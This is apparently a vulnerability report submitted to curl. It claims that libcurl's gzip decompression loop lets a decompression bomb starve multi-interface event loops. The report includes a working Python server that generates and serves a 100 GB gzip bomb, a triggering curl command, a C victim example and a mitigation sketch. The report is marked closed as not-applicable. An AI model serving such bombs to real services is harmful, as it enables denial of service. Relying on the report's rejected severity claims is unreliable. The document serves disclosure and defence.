# Unbounded GZIP Decompression Leading to Event-Loop Starvation

Disclosed: 2026-03-31 05:51:39 by ok3y to curl
Severity: Medium

## Vulnerability Details
When libcurl is configured to decompress HTTP responses (via `CURLOPT_ACCEPT_ENCODING` or the `--compressed` CLI flag), it performs no bounds checking on the decompressed output and has no mechanism to yield execution during a massive expansion. If an attacker serves a highly compressed payload (a decompression bomb), libcurl's core decoding function `inflate_stream()` in `lib/content_encoding.c` processes it in an unbounded, synchronous `while(!done)` loop. For backend services using libcurl's non-blocking I/O interface (`curl_multi_perform`), this forces the library to synchronously decompress gigabytes or terabytes of data without yielding control back to the application's event loop, leading to complete thread starvation and denial of service (DoS) for all other active transfers handled by that multi handle.

## Summary

The vulnerability resides in how libcurl drives the zlib inflate loop. The loop iterates synchronously until the currently buffered encoded chunk is fully decompressed. An attacker can stream a roughly 100 MB highly compressed payload that expands to 100 GB or more. Because libcurl enforces no limit on the decompression ratio, and never pauses to return control to the caller during long runs of `Z_OK` iterations, the CPU core running the multi interface becomes 100% busy. This is highly disruptive for microservices, webhooks, and other automated systems that use libcurl under the hood with compression enabled to save bandwidth.

## Affected version

curl 8.19.0 (x86_64-pc-linux-gnu) libcurl/8.19.0

## Steps To Reproduce

To cleanly demonstrate the severity in terms of CPU starvation (and avoid simply filling a disk), I provide a self-contained PoC that generates a 100 GB decompression bomb dynamically. In a real-world scenario targeting a backend service, the application's thread freezes entirely.

### Step 1: Save the Malicious Server Script

Save the following Python script as `server_bomb.py`. It dynamically generates a custom gzip payload engineered to expand to exactly 100 GB of zeros.

```python
#!/usr/bin/env python3
import gzip
import io
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

print("[*] Generating 100GB decompression bomb...")

# Generate a highly compressed 100 GB payload in memory
buf = io.BytesIO()
with gzip.GzipFile(fileobj=buf, mode='wb', compresslevel=9) as f:
    chunk = b'0' * (1024 * 1024)     # 1 MB of zeros
    for _ in range(100 * 1024):      # written 102,400 times (100 GB total)
        f.write(chunk)
BOMB_DATA = buf.getvalue()

class MaliciousServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        self.send_header('Content-Encoding', 'gzip')
        self.send_header('Content-Length', str(len(BOMB_DATA)))
        self.end_headers()
        self.wfile.write(BOMB_DATA)
        print(f"[!] Victim requested {self.path}. 100GB Payload delivered!")

    def log_message(self, format, *args):
        pass

if __name__ == '__main__':
    host, port = '127.0.0.1', 8080
    print(f"\n[*] Malicious Server running at: http://{host}:{port}/")
    try:
        HTTPServer((host, port), MaliciousServer).serve_forever()
    except KeyboardInterrupt:
        sys.exit(0)
```

### Step 2: Start the Malicious Server

```bash
python3 server_bomb.py
```

### Step 3: Trigger the Vulnerability with curl

To simulate a libcurl application fetching the payload and discarding it (or piping it to a null sink), we use the CLI and time the operation to demonstrate the CPU lock.

```bash
time curl --compressed http://127.0.0.1:8080/ -o /dev/null
```

### Step 4: Validate the Impact

Despite transferring only a small payload over the loopback interface, the curl process immediately pins a CPU core at 100% utilization. A CLI user can easily interrupt this, but a backend application driving the transfer through `curl_multi_perform` stalls completely: the thread spends minutes (or hours, if the payload is scaled to terabytes) exclusively in user-space CPU, executing zlib routines.

### Deeper Code-Level Analysis (Cause and Effect)

The root issue lies in `lib/content_encoding.c`, in the `inflate_stream()` handler:

```c
/* Because the buffer size is fixed, iteratively decompress and transfer to
   the client via next_write function. */
while(!done) {
  z->next_out = (Bytef *)zp->buffer;
  z->avail_out = DECOMPRESS_BUFFER_SIZE; /* rigidly set to 16KB */
  status = inflate(z, Z_BLOCK);
  if(z->avail_out != DECOMPRESS_BUFFER_SIZE) {
    if(status == Z_OK || status == Z_STREAM_END) {
      result = Curl_cwriter_write(data, writer->next, type, zp->buffer,
                                  DECOMPRESS_BUFFER_SIZE - z->avail_out);
      ...
```

**Cause and Effect:** The `while(!done)` loop runs for as long as `inflate()` keeps returning `Z_OK` for the provided input chunk. Because `z->avail_out` is statically constrained to 16 KB, expanding a 100 GB payload forces libcurl to execute 6,553,600 consecutive loop iterations (100 GB / 16 KB), block by block. Crucially, libcurl never yields back to the application's event loop during this expansion. This breaks the non-blocking promise of the `multi` interface: the execution thread is hijacked purely for CPU-bound decompression, as the sketch below illustrates from the caller's perspective.
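To make the starvation concrete, here is a minimal sketch of a victim application (not part of the original report) that multiplexes two transfers on one multi handle. The bomb URL points at the PoC server above; `http://example.com/` is an illustrative stand-in for any other concurrent transfer. With the bomb in flight, a single `curl_multi_perform()` call can monopolize the thread for minutes, freezing the second transfer:

```c
/* Hypothetical victim service: two transfers sharing one multi handle.
   Compile with: cc victim.c -lcurl */
#include <stdio.h>
#include <curl/curl.h>

/* Discard the body; a real service would parse it instead. */
static size_t discard(char *ptr, size_t size, size_t nmemb, void *userdata)
{
  (void)ptr; (void)userdata;
  return size * nmemb;
}

static CURL *make_handle(const char *url)
{
  CURL *h = curl_easy_init();
  curl_easy_setopt(h, CURLOPT_URL, url);
  /* "" enables all built-in decompressors -- the vulnerable path */
  curl_easy_setopt(h, CURLOPT_ACCEPT_ENCODING, "");
  curl_easy_setopt(h, CURLOPT_WRITEFUNCTION, discard);
  return h;
}

int main(void)
{
  curl_global_init(CURL_GLOBAL_DEFAULT);
  CURLM *multi = curl_multi_init();
  CURL *bomb = make_handle("http://127.0.0.1:8080/"); /* PoC server */
  CURL *benign = make_handle("http://example.com/");  /* starved transfer */
  curl_multi_add_handle(multi, bomb);
  curl_multi_add_handle(multi, benign);

  int running = 1;
  while(running) {
    /* Expected to return quickly; with the bomb queued, one call can
       sit inside inflate_stream() for minutes of pure CPU work. */
    curl_multi_perform(multi, &running);
    curl_multi_poll(multi, NULL, 0, 1000, NULL);
  }

  curl_multi_remove_handle(multi, bomb);
  curl_multi_remove_handle(multi, benign);
  curl_easy_cleanup(bomb);
  curl_easy_cleanup(benign);
  curl_multi_cleanup(multi);
  curl_global_cleanup();
  return 0;
}
```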
## Impact

An attacker can orchestrate a targeted denial of service (DoS) against backend services, automated crawlers, webhooks, or headless systems that integrate libcurl with `CURLOPT_ACCEPT_ENCODING` enabled. The primary threat is CPU starvation / thread blocking in backend applications:

- **Event-loop blockade in libcurl integrations:** Applications using the non-blocking `multi` interface will freeze. A single maliciously crafted URL blocks the main dispatch thread indefinitely, starving all other concurrent network operations handled by that instance.
- **Realistic threat model:** While a CLI user fetching a file merely experiences a hanging terminal (easily interrupted), backend microservices fetching external avatars, RSS feeds, or webhook endpoints with compression enabled (a standard practice to save bandwidth) suffer total worker exhaustion.

Until the decompression loop is bounded in the library itself, applications can limit their exposure with the stopgap sketched below.
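The following is a minimal sketch of an application-level workaround, not a fix in libcurl; the 64 MB cap, the URL, and the helper names (`capped_write`, `struct sink`) are illustrative assumptions. Because `inflate_stream()` hands each decompressed 16 KB slice down the writer chain, the application's write callback sees the decoded bytes and can abort by returning a short count, which makes libcurl fail the transfer with `CURLE_WRITE_ERROR`. This bounds the total expansion per transfer; it shortens the blocking window rather than eliminating it:

```c
/* Hypothetical mitigation: cap decompressed bytes from the write callback.
   Compile with: cc capped.c -lcurl */
#include <stdio.h>
#include <curl/curl.h>

#define MAX_DECODED_BYTES (64UL * 1024 * 1024)  /* illustrative 64 MB cap */

struct sink {
  size_t total;                 /* decompressed bytes accepted so far */
};

static size_t capped_write(char *ptr, size_t size, size_t nmemb,
                           void *userdata)
{
  struct sink *s = userdata;
  size_t n = size * nmemb;
  (void)ptr;
  s->total += n;
  if(s->total > MAX_DECODED_BYTES) {
    fprintf(stderr, "aborting: decompressed output exceeded cap\n");
    return 0;                   /* short return => CURLE_WRITE_ERROR */
  }
  return n;                     /* accept (and normally process) the chunk */
}

int main(void)
{
  struct sink s = {0};
  curl_global_init(CURL_GLOBAL_DEFAULT);
  CURL *h = curl_easy_init();
  curl_easy_setopt(h, CURLOPT_URL, "http://127.0.0.1:8080/"); /* PoC server */
  curl_easy_setopt(h, CURLOPT_ACCEPT_ENCODING, "");
  curl_easy_setopt(h, CURLOPT_WRITEFUNCTION, capped_write);
  curl_easy_setopt(h, CURLOPT_WRITEDATA, &s);
  CURLcode rc = curl_easy_perform(h);
  printf("transfer ended: %s (%zu bytes decompressed)\n",
         curl_easy_strerror(rc), s.total);
  curl_easy_cleanup(h);
  curl_global_cleanup();
  return 0;
}
```

The same callback works unchanged on a multi handle, since the cap is enforced wherever libcurl delivers decoded data.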
## Report Stats

- Report ID: 3632427
- State: Closed
- Substate: not-applicable
- Upvotes: 1